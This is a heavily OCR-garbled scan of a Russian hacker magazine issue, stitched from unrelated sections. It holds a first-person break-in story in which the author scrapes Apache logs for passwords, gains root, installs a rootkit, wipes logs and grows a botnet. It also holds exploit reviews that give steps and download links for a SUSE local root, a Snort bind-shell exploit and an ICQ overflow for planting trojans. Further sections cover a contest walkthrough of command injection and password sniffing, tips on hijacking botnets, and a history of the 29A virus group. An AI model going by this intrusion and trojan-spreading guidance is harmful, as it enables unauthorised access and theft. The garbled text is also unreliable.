С утра я заметил директорию /Іодз, зайдя в которую, я нашел кучу логов 
АрасНе, доступных мне для чтения; их размер действительно удивил ме- 
ня. Перебирать такие файлы вручную — ужаснейший геморрой, поэто- 
му я заюзал скрипт, написанный ЗазИікз'ом в статье «Университетский 
хак», в июньском выпуске X. Этот сценарий ищет в каждой строке сло- 
во разе и помещает его в отдельный файл: 

#!/изг/Ьіп/регІ 

$сІіг=7ѵаг/арасІпе/Іодз"; 

орепсІіг(ОІР,$сііг) 

@а=геасІсІіг ЭІВ; 

ІогеасФ(@а){ 

ргіпі "ЗеагсЫпд $_ ... \п"; 

5у5Іет("саІ $сііг/$_ Ідгер раззхЛтр/ІетрІіІе.М"); 

} 

ргіпі "Эопе \п"; 

Думаю, пояснять работу скрипта не надо. Пока скрипт трудился, 
я усердно пожирал все, что было в холодильнике. Через некоторое 
время, обратившись к файлу ІетрЛІе.ІхІ, я нашел огромное количе- 
ство пассов, один из которых подходил к админке. Пароль подошел 
к ЗЗН и к РТР, но этот аккаунт входил в группу ѵѵПееІ, а его пароль, 
как я убедился, совпадал с рутовым! Таким образом, я получил пол- 
ный доступ к вражеской машине. 

Затем установил на тачку руткит ЗНѴ4 от «шкупи хакере», почистил ло- 
ги логвайпером для І_іпих ѴапізИ, удалил палевный шелл, сохранил себе 
на РЮЭ копию файла /еіе/раззуѵб и немного поигрался с захваченной 
машиной, установив туда прокси :). 

[хэппи энд] А теперь давай сделаем выводы. 

Во-первых, ХЗЗ-атаки — это не шутка, и многие начинающие хаке- 
ры и админы просто забивают на эту уязвимость, так как считают ее 
бесполезной. Я очередной раз доказал, что это не так. Во-вторых, никог- 
да не доверяй ссылкам, которые тебе присылают по почте. Не следует 
делиться с собеседниками на форумах о том, какой ты используешь 
браузер, даже если очень хочется потешить самолюбие. 

В третьих, логи — лакомый кусочек для хакера, старайтесь ограничить 
доступ ко ВСЕМ логам. Администратор правильно сделал, что поставил 
644 атрибут на все Нізіогу-файлы. Также не стоит юзать ІЕ, так как все 
сплоиты, которые находятся в паблике, — это 10 — 20% всех найденных 
багов в популярном браузере. Никто не спешит раздавать их направо 
и налево, так как на них зарабатывают немалые деньги. 

Но даже при помощи этого древнего паблик-сплоита я неплохо припод- 
нял свой ботнет. Сайт посещала куча людей, и у многих были старые 
браузеры в дырочку © 
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[описание] Операционная система ЗиЗЕ 
І_іпих всегда славилась своей стабильностью 
и безопасностью. Хотя бы потому, что это 
коммерческая ОЗ. Но не так давно хакеры 
нашли опасную брешь в ЗиЗЕ. Ошибка закра- 
лась в пакете рѵѵбиіііз, в приложении сПІп. 
Данный бинарник по умолчанию имеет суид- 
бит, а его предназначение — изменение ин- 
формации о пользователе. В исходниках это- 
го файла было найдено переполнение буфе- 
ра, ведущее к следующему: любой пользова- 
тель мог дописать в конец /еіс/зЬасіоѵѵ инфор- 
мацию о левом аккаунте, а затем произвести 
суид на него. Собственно, это и проделывает 

, , хитрый эксплойт. Сперва происходит хитрая 

Ф дозапись данных в /еіс/згіасіоѵѵ, а затем запус- 
0 кается /Ьіп/зи. В итоге хакер наделяется 

^ самым низким ІІЮ'ом :). 

о 

с; 

т [защита] Разработчики системы сразу же от- 
реагировали на уязвимость, выпустив патчи для 
каждой уязвимой версии ЗиЗЕ. Посмотреть вну- 
шительный список заплаток можно на странице 
/ 7 11 р ://Ііз Із.зизе. сот/ а гсЬіѵе/з из е -зесигііу- 
аппоипсе/2005-Моѵ/0002Ыт1. 

[ссылки] Забирай эксплойт, написанный на 
языке ВАЗН, со страницы ѵѵѵѵѵѵ. зесигііуІаЬ. ги/рос/ 
ех1га/241883.рЬр. История ошибки и ее техничес- 
кие моменты пока не раскрываются. 

[злоключение] ЗиЗЕ І_іпих очень популярная 
операционка среди Ыпих'оидов, а теперь и сре- 
ди пользователей ІМоѵеІІ :). Поэтому смею пред- 
положить, что число локальных повышений 
прав будет увеличиваться с каждым днем. Всех 
админов ЗиЗЕ, читающих обзор, я мысленно 
призываю поставить спасительную заплатку. 

[дгееіз] На этот раз отличился багоискатель 
Нипдег (зизесИІп@Ііипдег.Ііи). Пожалуй, это его 
первый выдающийся эксплойт, поэтому друж- 
но поблагодарим «голодного хакера». 



[описание] Если ты помнишь, в недавнем об- 
зоре эксплойтов я описывал уязвимость в изве- 
стной ЮЗ под названием Зпогі. Если в прошлой 
ошибке Зпогі страдал переполнением при 
включенном режиме отладки, то теперешний 
баг выдает себя при любых режимах запуска. 
Ошибка переполнения возникает при обработ- 
ке так называемых Васк ОгіТісе пакетов. Злоу- 
мышленник может сформировать кривой пакет 
с некорректным полем длины, поэтому стано- 
вится возможным выполнить произвольный 
код. Багоискатели написали рабочий эксплойт, 
выполняющий ЬіпсІ шелла на порту 31337 уяз- 
вимой системы. 

В эксплойте представлены две цели с разными 
режимами тестирования. Достаточно выбрать 
одну из них (как правило первую), указав в каче- 
стве параметров ір-адрес и номер цели. Если все 
сделано верно, на бажной системе откроется 
порт 31337 с интерпретатором /Ьіп/Ьазіі внутри. 

[защита] На официальном сайте Зпогі выло- 
жена последняя версия ЮЗ — ЗпогІ-2.4.3. В 
данном релизе брешь полностью исправлена. 

[ссылки] Рабочий эксплойт находится по адресу 
ѵѵѵѵѵѵ. зесигііуІаЬ . ги/рос/ехІга/24 1424.рЬр. Описа- 
ние технических моментов ошибки можно найти 
в исходном коде эксплойта, либо на странице 
ѵѵѵѵѵѵ.зесигіІуІаЬ.ги/ѵиІпегаЫІіІу/ зоигсе/24 1240.рЬр. 

[злоключение] За текущий год это уже вто- 
рой удар по Зпогі. Учитывая тот факт, что про- 
дукт является системой обнаружения атак, ре- 
путация производителя сильно упала. Теперь у 
злоумышленника появилось целых две лазейки 
в «центр самой защищенной системы». 

[дгееіз] Брешь была выявлена известной 
командой Іпіегпеі Зесигііу Зузіетз. После пуб- 
ликации сведений об уязвимости популярная 
команда ТНС ( ѵѵѵѵѵѵ. ІЬс.огд ) написала многофу- 
нкциональный эксплойт.ХІІ\ІЕ-І_ІВ ВЕМОТЕ 
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[описание] Не так давно хакерам удалось 
найти весьма оригинальную ошибку в ІСО 2003а. 
Это простое переполнение буфера в клиенте, 
никак не относящееся к протоколу ІСО. Все, что 
делает эксплойт, — генерирует два значения 
(Рігзі и І_азІ ІМате). При подстановке этих данных 
в поле поиска новых пользователей, произойдет 
загрузка и запуск файла, указанного в качестве 
параметра к сплоиту. Другими словами, для 
заражения ламера трояном хакеру нужно 
выполнить следующие шаги: 

О Залить на удаленный сервер трояна, 
а затем запустить эксплойт 
с параметром-ссылкой на вредоносный файл. 
©Найти ушастого ламера и навешать 
ему лапшу на уши про новую фичу в ІСО, 
а потом ненавязчиво попросить 
заполнить два поля в «поиске пользователей». 
©Присоединиться к компьютеру жертвы 
и наслаждаться :). 

[защита] Уязвимость замечена в клиентах ІСО 
2003а и предыдущих версиях. В последующих ре- 
лизах брешь отсутствует. Никаких заплаток для 
уязвимых клиентов выпущено не было. 

[ссылки] Эксплойт находится на странице 
ѵѵѵѵѵѵ. зесигііуІаЬ. ги/рос/ехіга/24 1544.рЬр. Для лени- 
вых людей имеется также откомпилированный ва- 
риант: ЫІр://тубоот-ѵ.[то-пе1.ги/іср_Ьоі.ехе. 

[злоключение] Для эксплуатирования жерт- 
вы необходимо обладать навыками социальной 
инженерии. В теперешнее время довольно 
сложно найти ламера, который с радостью вве- 
дет непонятные данные в какую-то форму. 
Однако еще не перевелись индивидуумы, умею- 
щие убеждать других людей. Если ты относишь- 
ся к таким личностям — эксплойт для тебя :). 

[дгееіз] Идея бага и эксплойт полностью 
принадлежат хакеру АТплаСА {ѵѵѵѵѵѵ. аІтасазоИ. сот) . 
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1 В ноябрьском конкурсе тебе надо было вздрючить торговцев 
сплоитами, которые тусовались на ігс-канале #ха ( сіаі.пеі.ги ). На 
этом канале жил бот-барыга с ником агтеп, который принимал 
команды стандартным образом: !ст<± 

Найти баг не составляло труда. Получив список всех доступных 
команд (ІПеІр), нужно было зарегистрироватьяс у бота и попы- 
таться получить описание конкретного сплойта при помощи ко- 
манды Ісіезс. Несложно было заметить и догадаться, что пара- 
метр с идентификатором — это не что иное, как имя файла с опи- 
санием сплойта. Соответственно, подставив что-то вроде ІІІзІ, 
можно было выполнять на сервере команды. 

Но вот незадача: команды с пробелами не выполнялись, строка 
ограничивалась пятью символами, а все лишнее отрезалось. 
Значит, заменить пробел $ІР5 не получится :(. Но у тебя еще ос- 
тавалась возможность читать файлы на сервере и смотреть со- 
держимое директорий. Например, можно было посмотреть ис- 
ходник бота — файла іе.рі. 

Внутри сорца легко было заметить, что после оплаты заказа, клие- 
нтцу сообщается, где именно он может скачать сплоит, так как да- 
ется ссылка. Перейдя по ней, ты обламывался: нужен был пароль. 
На странице с ошибкой 401 было мыло Иотза.ІоІШдтаіІ.сот. 

Пообщавшись с барыгой, можно было понять, что ему необходимы 
проксики, и он будет рад, если ты дашь ему хотя бы одну штучку. 
Это было ключевой вещью: необходимо было поднять левый прок- 
сик, который логирует всю передаваемую через него информацию, 
и подсунуть его барыге. После этого незадачливый торговец подк- 
лючался к свой базе, и ты вполне мог выудить его пароли. 

Как известно, при использовании [Шр-аутентификации сер- 
веру передается строка Іодіп:раззѵѵогсІ, закодированная 
Ьазе64. В логах нужно было отыскать строчку наподобие 
этой а091с2Е6У29ѵЬѲИѵЬХМИ==, после чего декодировать 
ее, к примеру, рИр-функцией ітар_Ьазе64() и получить ріаіп- 
Іехі-логин с паролем. 

Победителя в этом месяце целых два: почти одновременно кон- 
курс прошли ЬтН 7. и ВОМ ЗНАЫКАВ. Поздравляем этих парней, 
которые выиграли эксклюзивный медосмотр от Саши Лозовско- 
го и по 50 граммов чистейшего медицинского спирта. 

Анонс нового конкурса ищи в двадцатых числах на форуме 
іогит. хакер. ги. 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




БУДЬ КОНКРЕТНЫМ И ЗАДАВАЙ КОНКРЕТНЫЕ ВОПРОСЫ! 
СТАРАЙСЯ ОФОРМИТЬ СВОЮ ПРОБЛЕМУ МАКСИМАЛЬНО 
ДЕТАЛЬНО ПЕРЕД ПОСЫЛКОЙ В НАСК-РАО. ТОЛЬКО ТАК 
Я СМОГУ ДЕЙСТВИТЕЛЬНО ПОМОЧЬ ТЕБЕ ОТВЕТОМ, УКА- 
ЗАТЬ НА ВОЗМОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБЩИХ 
ВОПРОСОВ ВРОДЕ «КАК ВЗЛОМАТЬ ИНТЕРНЕТ?», ТЫ 
ЛИШЬ ПОТРАТИШЬ МОЙ И СВОЙ ПОЧТОВЫЙ ТРАФИК. 
ТРЯСТИ ИЗ МЕНЯ ФРИШКИ (ИНЕТ, ШЕЛЛЫ, КАРТЫ) — 
НЕ СТОИТ, Я САМ ЖИВУ НА ГУМАНИТАРНУЮ ПОМОЩЬ! 
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О: Как ѴѴагСгаЙ понимает, что я пользуюсь читами? 

А: Долгое время юзеры возмущались превосходством 
отдельных игроков, которые не стеснялись использова- 
ния программок-сііеаіег’ов для обретения всевозможных 
благ игровой цивилизации. ВІіггагсІ, создатель послед- 
ней ѴѴогІсІ оі ѴѴагсгаК пошла на встречу особо пережива- 
ющим юзверам и выпустила свой зруѵѵаге — программу- 
шпион, которая поставляется вместе с основной игрой и 
называется ѴѴагсІеп. Она изучает твои процессы, взве- 
шивает загруженность памяти и ограничивает твой дос- 
туп к читам. Готовых средств подавления проги я пока не 
видел, но могу нацелить потенциального создателя оной 
на прогу ТГіе Ооѵегпог, которая показывает все действия 
ѴѴагбеп’а — ѵѵѵѵѵѵ.гооікіі.сот/пеѵѵ8геасі.рІір?пешісІ=37 1 . 

О: Что за радиопередатчики американцы собрались вши- 
вать в паспорта для увеличения зесиге’ности? 

А: Вчера они начали требовать сдачу отпечатков пальцев 
для всех гостей Америки, а сегодня уже планируют внедрять 
ВРЮ-чипы, где будет располагаться вся паспортная инфор- 
мация о владельце. Данные можно будет считать специаль- 
ным радиосканером. На недавней зесигііу-конференции 
один из исследователей показал наглядно, что информа- 
цию о паспорте можно элементарно считывать: чувак при 
помощи несложного оборудования научился это делать са- 
мостоятельно. Так что защищенность формата передачи 
данных вызывает серьезные вопросы. Не меньше вопросов 
возникает и у правозащитников, которые видят в новой раз- 
работке возможность контроля граждан и маршрутов их пе- 
редвижений. Первыми подопытными станут правитель- 
ственные работники и дипломаты для передачи эстафеты 
простым смертным в следующем году. 

О: Кто такие Ііопеутопкеуз? 

Они как-то замешаны в ѵѵеЬ-троянинге? 

А: Не только мишки любят мед, но и раскеі топкеуз, то есть 
зсгір* кісісііез. Эти хакеры-бакланы жадны до легких мише- 
ней: например, непатченных ѴѴіпсІоѵѵз ХР компьютеров. Дан- 
ный концепт стал логическим продолжением технологии 
Ііопеуроіз, то есть систем серверов, которые были разброса- 
ны по Сети и приманивали злоумышленников, а чаще всего 
— его творений, сетевых червей. 

Я никогда не слышал термин «троянинг», но раз уж ты опе- 
рируешь именно им, придется ответить тебе на вопрос, хоть 
я и мог сказать, что не понял, о чем ты говоришь :). 
Компания МісгозоЙ СуЬегзесигйу апсі Зузіетз Мападетепі 
Резеагсіі Огоир (авторы концепта «медовых обезьян») орга- 
низовали большую Сеть из дырявых компьютеров, которые 
серфят Сеть, прыгая с сайта на сайт, где могли притаиться 
зараженные страницы. Зараза оседает на компьютерах спе- 
цов для дальнейшего изучения и детального анализа их ра- 
боты. Особенно активно М3 наседает на спамеров, которые, 
после выявления, оказываются приглашенными в зал суда. 
Более $5М контора отбашляла на эту аферу. В Сети обезь- 
ян располагаются компы разного уровня ирбаіе’ности, для 
точного выявления аппетитов интернет-бандитов и прице- 
лов на конкретные уязвимости. За более детальным описа- 
нием ііопеу-концепта, рекомендую наладиться на сайт 
ѵѵѵт.Ііопеупеі.огд. Стоит отметить, что М3 была вовсе не 
первой, и даже сам автор успел принять пару визитов от ро- 
ботов Зутапіес в своих сетях 5 лет назад. 
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О: Какой самый большой ботнет удалось собрать? 
Почему постоянно проходят разные цифры? 

А: Вопрос напоминает «Кто больше всех украл де- 
нег?». Тот, кто достаточно коварен и умен, никогда 
не обнаружит факта своего обогащения или его ис- 
точников. «Удалось собрать» — понятие очень отно- 
сительное, поскольку одно дело предполагать, что 
столько-то и столько-то компьютеров находится под 
контролем одного человека и совсем другое — дока- 
зать подобное в судебном порядке. Мечта о центра- 
лизованном контроле несметных тысяч «зомбаков» 
теряет актуальность, и современные сетевые «ра- 
бовладельцы» чаще и чаще не оставляют какой-ли- 
бо связи между имеющимися ботнетами. Здесь при- 
сутствует страх не только перед чекистами и ІТ-зеси- 
гііу компаниями, но и теми же коллегами по цеху, ко- 
торые не упускают случаев перевести чужих ботов в 
свое собственное пользование. Кто-то намеренно 
держит свои ботнеты раздельно для последующей 
продажи или сдачи в аренду. Самый большой бот- 
нет, инфа о котором к настоящему моменту получи- 
ла широкую огласку, состоял из 1 ,5 миллиона ком- 
пов, которые находились под контролем криминаль- 
ного трио из Голландии. В самом начале им припи- 
сывали владение 100 000 компьютеров, но позже 
выяснилось, что цифра значительно больше. 

О: Можно ли доверять системе 
хранения паролей в Огасіе? 

А: Отдельные темные личности настолько глубоко 
уходят в хакинг, что даже успешно свергают незыбле- 
мые постулаты безопасности. Совсем недавно инсти- 
тут ЗАІЧЗ сотряс мозги поклонников Огасіе, когда 
раскрыл механизм генерации паролей для этой базы 
данных. В ходе исследований выяснилась целая се- 
рия слабостей, которые позволяют достаточно быст- 
ро раскрывать пользовательский пароль. К примеру, 
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несложно убедиться в том, что «отпечаток» пароля на 
самом деле изготавливается из строки 
изегпате.раззѵѵогсі, сконкатенированных логина и па- 
роля. Так же легко можно проверить, что система ау- 
тентификации нечутка к регистру, хэш для паролей 
Арріе и аррІ_Е будет одинаковым. Так же специалис- 
ты Санс нашли еще несколько слабостей в самом ал- 
горитме, о чем подробно написали в документе, 
представленном на сайте организации. 

Запз.огд — далеко не шпана, и действовали впол- 
не корректно: дали разработчикам несколько дней 
на устранение проблемы. Судьба поправки пока не 
известна, равно как и не доступны комментарии 
инженеров Огасіе. Проблема стойкости паролей 
оказывается в авангарде, свежий скандал со 
вскрытием школьной БД в Калифорнии — яркий 
тому пример. В общем, отпечатки пальцев, как 
средство идентификации, — на повестке дня. 

О: Поломал несколько ѴѴі-Рі-сетей и столкнулся с та- 
кой проблемой: лень каждый раз руками прописы- 
вать все настройки. ОИСР есть не везде! Можно как- 
то автоматизировать процесс? 

А: Судя по всему, такое понятие, как ІарЮр гоатіпд те- 
бе не знакомо. А ведь существует целая серия реше- 
ний, позволяющих «на лету» переключать твой ноут с 
сетки на сетку. За примером далеко ходить на надо: 
МиІШЧеІѵѵогкМападег (ѵѵѵт.дІоЬезоІі.сот) позволит те- 
бе автоматизировать переключение между сетями, 
когда ты перемещаешься с работы домой, по дороге 
работая во взломанных сетях :). Если программа не 
придется тебе по вкусу, то на сайте имеется разум- 
ный ликбез по вопросу ноутбучного роуминга; знато- 
ки смогут собрать подобное решение на коленке, за- 
юзав системные скрипты. Лекарств от жадности для 
версии 8.* пока не вышло, но это не мешают нахаля- 
ву юзать седьмую версию программы. 
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О: Чем удобнее всего редактировать НЕХ-файлы? До 
сих пор юзаю какую-то дурацкую программу под 
005. Хочется чего-то поновее! 

А: Могу предложить тебе бесплатный универсальный 
редактор РЗРаб ЕсШог (ѵѵѵт.рзрасі.сот). Несмотря на 
название, созвучное с РІауЗіайоп, к этой игровой ма- 
шине программа никакого отношения не имеет, одна- 
ко наделяет тебя большими возможностями. Дело в 
том, что софтина действительно универсальна и уме- 
ет работать и подсвечивать не только НЕХ-файлы, но 
и код ѴВ, С++, ЗОІ_, РНР, АЗР и РуІІіоп. Можно подго- 
нять настройки синтаксиса под свои, самые личные 
нужды. Веб-мастерам оставили удобный НТМЬре- 
дактор со встроенным Кр-клиентом для моментально- 
го влива своих шедевров на ѵѵеЬ. Варез получается 
фришным, порой тормозит с обновлениями, но удоб- 
ства не теряет из-за обозначенных выше правильных 
дефолтовых настроек. Недавно был произведен 
серьезный ІасеШ другого, уже коммерческого, редак- 
тора — ШгаЕсІіІ (ѵѵѵт.иіігаесііі.сот). Стал посимпатич- 
нее и оброс новыми опциями и настройками. 

О: Хочу написать своего бота и научиться его впари- 
вать. Как можно наиболее детально изучить уже гото- 
вые образцы? 

А: Конкретные инструкции на эту тему стоят нема- 
лых денег, поэтому тебе придется соображать са- 
мому. Первым делом совершенно понятно тебе на- 
до заразиться. Для этого надо поднять сетап сис- 
темы на том уровне безопасности, который тебя 
интересует. Потом необходимо установить софт 
для изучения НТТР-трафика, выключить все анти- 
вирусы и апіі-зруѵѵаге софт и отправиться серфить 
левые порнушные сайты, искать варез, лазить по 
разным трэшевым каталогам и т.д. Все с одной 
целью: подцепить заразу и начать ее изучать. 
Первым делом, когда почуешь, что подцепил трояна, 
нужно понять, как именно ты заразился. Для этого, 
очевидно, надо будет внимательно проштудировать 
ИітІ-код заразной страницы и попробовать отыскать 
там сплоит, который влил тебе гада. 

Там, при помощи любого снифера, уже можно бу- 
дет подсмотреть, о чем шепчется зверек со своим 
интернет-командованием, какой используется про- 
токол, и вообще, какого рода информацию переда- 
ет ползунка. При помощи этих данных ты не толь- 
ко сможешь перенять часть опыта, но и постарать- 
ся захватить чужой ботнет. 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ [СЦЕНА] ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕРРІІМ НЬЮСЫ 



Короли ѴХ-сцены Шпуа 



История группы 29А 



В 1991 ГОДУ НА ѴХ НЕАѴЕЫ, САМОМ 
ПОСЕЩАЕМОМ САЙТЕ, ПОСВЯЩЕН- 
НОМ КОМПЬЮТЕРНЫМ ВИРУСАМ, 
ОБЪЯВИЛОСЬ ГОЛОСОВАНИЕ. ПО- 
СЕТИТЕЛЯМ ПРЕДЛАГАЛОСЬ ОПРЕ- 
ДЕЛИТЬ ЛУЧШУЮ ВИРУСНУЮ ГРУП- 
ПУ, ЛУЧШЕГО СОЗДАТЕЛЯ ВИРУ- 
СОВ, ЛУЧШИЙ ВИРУСНЫЙ ЖУРНАЛ 
И НЕКОТОРЫЕ ДРУГИЕ ВЕЩИ. 
ВЫБОР МНОГИХ В ГЛАВНОЙ НОМИ- 
НАЦИИ БЫЛ ОДНОЗНАЧНЫМ — 
ГРУППА 29А. ЛУЧШИМ ВИРУСМЕЙКЕ- 
РОМ СТАЛ ЕЕ МЕМБЕР, ЛУЧШИМ 



ЖУРНАЛОМ — ЕЕ Е-ШЕ. НА ПРОТЯ- 
ЖЕНИИ ДОЛГОГО ВРЕМЕНИ 29А 
БЫЛА ЭЛИТАРНОЙ КОМАНДОЙ, СОС- 
ТОЯЩЕЙ ТОЛЬКО ИЗ ЛУЧШИХ КОДЕ- 
РОВ. ЧЛЕНЫ ГРУППЫ ВЫПУСТИЛИ 
СОТНИ ВИРУСОВ, МНОГИЕ 
ИЗ КОТОРЫХ СТАЛИ РЕВОЛЮЦИОН- 
НЫМИ. 29А ПО-ПРЕЖНЕМУ АКТИВНА 
И ПРОДОЛЖАЕТ СОЗДАВАТЬ НОВЫЕ 
ЦИФРОВЫЕ ФОРМЫ ЖИЗНИ, А В 
СЛЕДУЮЩЕМ ГОДУ ГОТОВИТСЯ 
ОТПРАЗДНОВАТЬ СВОЙ 10-ЛЕТНИЙ 

ЮБИЛЕИ I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 




[становление] В середине 90-х Интернет 
в Испании был доступен только некоторым уни- 
верситетам, научным организациям и коммер- 
ческим компаниям. Обычные компьютерщики 
довольствовались ВВЗ и Рібопеі. Впрочем, жа- 
ловаться им не приходилось, ведь на бордах и в 
конференциях было намного проще найти 
«братьев по разуму». Особенно тем, у кого есть 
такое странное и специфичное увлечение, как 
компьютерные вирусы. Центром общения таких 
людей была испанская фидошная конфа, един- 
ственная в своем роде. Народ там делился сво- 
им опытом, идеями и исходниками. Одно было 
плохо — конференцией заправлял модератор, 
который постоянно устанавливал новые прави- 
ла и нередко банил тех, кто участвовал в обсуж- 
дении зловредных алгоритмов. Неважно, в ис- 
следовательских целях или для поиска защиты 
от них. В конце 1995 года двум постоянным 
участникам ѴігизВизІег и Оогсіоп ЗПитѵѵау все 
эти ограничения надоели, и они решили создать 
свою ВВЗ Эагк ІМобе, в которой свободное об- 
суждение вирусных технологий будет не только 
не запрещаться, но всячески приветствоваться. 
На борду перешли еще несколько человек, не- 
довольных политикой модератора, а Ѵігиз Визіег 
лично пригласил людей, которых считал специа- 
листами по вирусам. Эагк ІМобе собрала лучших 
ѴХ-кодеров Испании, и на ней каждый день шли 
горячие обсуждения по созданию вирей, совме- 



стный анализ кода и поиск багов в антивирусах. 
Со временем база знаний накапливалась, и Мг. 
Запсішап, один из талантливых крэкеров на 
ВВЗ, решил, что было бы неплохо поделиться 
информацией с остальными. Поэтому он создал 
вирусный электронный журнал. 

В это время международная ѴХ-сцена пережи- 
вала не лучшие времена. Многие авторитетные 
группы, такие как ТІіиз, Оагк, Оиапіигті, ЗѴІ_ уш- 
ли со сцены, исчезла известная Оагк Сопзрігасу, 
хотя часть ее мемберов основала новую группу, 
некоторые коллективы объединились, чтоб не 
развалиться окончательно. А единственным по- 
полнением на смену уходящим старичкам стала 
Сотриіа (Запдзіа, е- 2 Іпе ОНО которой не полу- 
чил большого признания. 

К тому времени, как началась работа над жур- 
налом, тусовка из Оагк ІМобе ВВЗ официально 
стала группой 29А (в компьютерной кодировке 
«666»). Парни не просто хотели создать очеред- 
ной е- 2 Іпе, журнал должен был стать оплотом 
сцены и в каждом байте нести полезную инфор- 
мацию. Поэтому выпуск 29А гіпе затянулся на 
целый год. Задержку вызвал и тот факт, что 
большинство мемберов группы успели обзавес- 
тись доступом в инет и кучу времени убивали 
в ІВС, общаясь на программерских и вирусных 
каналах. Наконец 1 3 декабря 1 996 года состоял- 
ся релиз журнала. Первый номер включал в се- 
бя несколько туториалов по полиморфным и 
макро-вирусам, руководство по отключению ан- 
тивирей, дизассемблированный код интересных 
вирусов (2Иепдхі, Ѵ.6000) и, конечно, исходники 
зверьков, написанных членами 29А. Политика 
группы с самого рождения была четкой — 
не выпускать в свет деструктивные организмы, 
поэтому в вирях, опубликованных в журнале, 
ставка делалась на оригинальность и новизну, ни- 
какого вреда они нанести не могли. 
Нельзя сказать, что 29А гіпе выз- 
вал фурор на ѴХ-сцене, но журнал 
стал событием и с интересом изу- 
чался всеми активными вирусмей- 
керами. Одновременно с интере- 
сом к журналу появился интерес к 
группе, которая его выпускала. 

[дальнейшее развитие] Вто- 
рой номер 29А ждали долго, боль- 
ше года (вообще, выпускать по 
журналу в год стало своего рода 
традицией). На этот раз задержка 
произошла из-за реструктуриза- 
ции группы, обязательной военной 
службы у некоторых мемберов и 





увлечения Интернетом. Но главное — приш- 
лось полностью перестраиваться на новую 
ѴѴіпсІоѵѵз-платформу, так как 003 с выходом 
винды стал быстро устаревать. ѴѴіп32 стала 
«новой школой» для вирусмейкеров, обяза- 
тельной для изучения всеми, кто собирался 
продолжить создавать вирусы. 

97-й год стал переломным этапом для ѴХ-сце- 
ны. Период затишья закончился, и такие груп- 
пы, как іКх, ЗІ_АМ, ЗѴІ_, ЗіеаШі начали активно 
релизить новые вирусы и е-зины. 

Появилось несколько новых сайтов для вирусмей- 
керов, своей страничкой обзавелась и 29А. Раз- 
мещалась она по адресу Шр://29А .ізіаіогіида . сот 
и называлась 29А І_аЬз. Также в результате дол- 
гих посиделок в ІВС, сначала на ЕРІМеІ, потом на 
локальном испанском сервере, участники группы 
познакомились с новыми талантливыми кодера- 
ми, некоторые из которых присоединились к 29А. 
Появились мемберы из Дании (Оагктап), Вели- 
кобритании (Ваіааі), Бразилии (Ѵеспа), Канады 
(Верйіе) и даже Перу Цаску Оѵѵегіу). 

Помимо постоянного состава, который должен 
был активно принимать участие в наполнении 
журнала и периодически выпускать новые вири 
под лейблом 29А, группа заполучила несколь- 
ко внештатных друзей. От них не требовали ак- 
тивности, но они периодически в доброволь- 
ном порядке предоставляли группе свои нара- 
ботки, и их или печатали в е-зине, или выкла- 
дывали на сайт. 

В 1997 году впервые появились упоминания о 
29А в печатной прессе. В самом популярном 
испанском компьютерном журнале РСМапіа 
опубликовали большую статью на 4 страницы о 
вирусной сцене, и в частности о группе 29А. 
Чуть позже там же вышел подробный обзор ви- 
руса Тогего, написанного Мг. Запсішап. Хотя 
мемберам не запрещалось создавать деструк- 
тивный код, случаи выпуска зловредных виру- 
сов в Сеть старались сводить к минимуму. Ког- 
да в одном из интервью Мг. Запбтап'а спроси- 
ли, почему он пишет вирусы, автор сравнил се- 
бя с поэтами и художниками. «Я просто тво- 
рю». К вирусам относились, как к произведени- 
ям искусства, и некоторые создания ребят из 
29А действительно ими были. 

Несмотря на то, что основное общение проис- 
ходило на ІВС, 29А периодически организовы- 
вала риаллайфовые встречи. Первой такой 
встречей стала тусовка в Мадриде, которая из- 
начально планировалась как чисто 29А-пати. 
Некоторые мемберы из других стран, которые 
обещали поучаствовать, по разным причинам 
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вступление к первому выпуску 29А гіпе 




не появились, и к 29А присоединились несколь- 
ко знакомых вирусмейкеров. Единственным 
неиспанским сценером на пати был Зрапзка, 
приехавший из Франции. Встреча проходила 
сначала в ресторане, где парни за обедом по- 
общались, потом в интернет-кафе, где состоя- 
лась шумная ІВС-сессия, а закончилась в баре 
в центре Мадрида, где парни попробовали сов- 
местно написать вирус. Следующая тусовка 
была через год, теперь уже в Амстердаме. 

С каждым годом журнал 29 А становился все 
объемнее. С 4 выпуска в нем появилась новая 
ѴѴіпсІоѵѵз-оболочка на смену старой досовской. 
Появились новые постоянные рубрики: новости, 
интервью, приветы, обзор вирусных ресурсов, 
размышления о ѴХ-сцене. Каждый номер также 
включал десятки ѴХ-утилит и исходников виру- 
сов, написанных 29А и другими группами. Так 
как большинство других вирусных журналов 
умирали после первого же выпуска, конкурен- 
тов у 29А гіпе не было и, подобно РЬгаск'у для 
хакеров, он стал библией для вирусмейкеров 
всего мира. А жизнь самой группы 29А была не- 
отрывно связана с изданием журнала. 

После выхода печально известного червя Собе 
Веб в 2001 году вокруг 29А поднялся скандал. 
Многие приписывали авторство именно им, так 
как двое хакеров из Нидерланд, объявившие о 
том, что это их детище, причислили себя к мем- 
берам 29А. Шумиха не утихла даже после того, 
как на официальном сайте 29А было опублико- 
вано опровержение, где говорилось, что в груп- 
пе нет людей из Нидерландов, и хакеры просто 
хотели скомпрометировать группу. 

На протяжение 90-х годов и вплоть до наших 
дней состав группы постоянно менялся. Из 29А 
со временем ушло большинство ранних мембе- 
ров. Шли годы, и приходилось думать о профес- 



сии, семье, оставив свою страсть для прошлого. 
Некоторые продолжили заниматься вирусами, 
но уже с другой стороны — работая на антиви- 
русные компании и разрабатывая новые защит- 
ные алгоритмы. Некоторые навсегда оставили 
сцену и стали заниматься совсем другими ве- 
щами. На их смену приходили новые люди, ко- 
торые продолжали выпускать журнал. 

[известные вирусы от 29А] Мемберы груп- 
пы 29А создали более сотни самых разных виру- 
сов. Самые интересные были опубликованы в 
журнале, остальные осели или на ВВЗ и РТР, или 
винтах своих создателей. Но несколько их вирей 
стоит выделить особенно. Так как благодаря им о 
29А узнал весь компьютерный мир. 

Езрегапіо 

Первые сведения об этом вирусе появились в но- 
ябре 1997 года. Эсперанто создавался как пер- 
вый мультиплатформенный вирус, способный 
заражать машины, работающие под ЭОЗ, 
ѴѴіпбоѵѵз и Мае ОЗ. Но, несмотря на грандиозный 
замысел, попытка оказалась неуспешной. В ко- 
де виря содержались баги, не позволяющие ему 
